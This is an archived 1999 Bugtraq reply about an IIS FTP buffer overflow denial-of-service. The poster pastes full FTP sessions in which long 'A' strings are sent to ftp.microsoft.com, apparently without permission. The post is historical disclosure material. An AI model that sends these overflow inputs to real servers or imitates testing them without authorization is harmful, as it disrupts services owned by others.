OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: IIS FTP Exploit/DoS Attack

Re: IIS FTP Exploit/DoS Attack

Cristian Ivan (civanUSA.NET)
Mon, 25 Jan 1999 03:06:42 +0200

Look what I've got after testing on ... ftp.microsoft.com :)

ftp> o ftp.microsoft.com
Connected to ftp.microsoft.com.
220 ftp Microsoft FTP Service (Version 3.0).
User (ftp.microsoft.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-This is FTP.MICROSOFT.COM
 230-Please see the dirmap.txt file for
 230-more information. An alternate
 230-location for Windows NT Service
 230-Packs is located at:
 230-ftp://198.105.232.37/fixes/
230 Anonymous user logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bussys
deskapps
developr
dirmap.htm
dirmap.txt
DISCLAIM.TXT
disclaimer.txt
HOMEMM.old
KBHelp
ls-lR.txt
ls-lR.Z
LS-LR.ZIP
MSCorp
peropsys
PRODUCT.TBL
Products
Services
Softlib
solutions
226 Transfer complete.
ftp: 204 bytes received in 0.05Seconds 4.08Kbytes/sec.
ftp> quote nlst AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
150 Opening ASCII mode data connection for file list.
ftp> ls
425 Can't open data connection.
ftp> ls
200 PORT command successful.
200 PORT command successful.
ftp> clos
150 Opening ASCII mode data connection for file list.
ftp> ls
Not connected.
ftp>

If instead of the "quote nlst AAA..." command with "ls AA.." .. voila :

230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
550 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA: The data area passed to a system call is too small.
ftp>
And everything is normal from here on...

I've used the ftp command supplied with Windows98, who's not allowing me
to type those 316 characters, "the smallest possible buffer to pass that
will overflow IIS".:)


                                        May the mail get in touch with you
                                                   cRIS

++++++++++++++++++++++++++++++++
+++++++++++888+88e+++888++dP"8++
++e88'888++888+888D++888++C8b+Y+  eMAIL: civanusa.net
+d888++'8++888+88"+++888+++Y8b++  IRC: cRIS (UNDERNET)
+Y888+++,++888+b,++++888+b+Y8D++  WEB: http://soon.to.come
++"88,e8'++888+88b,++888++8edP++
++++++++++++++++++++++++++++++++

"Learning to love yourself is the greatest love of all."

  * Whitney Houston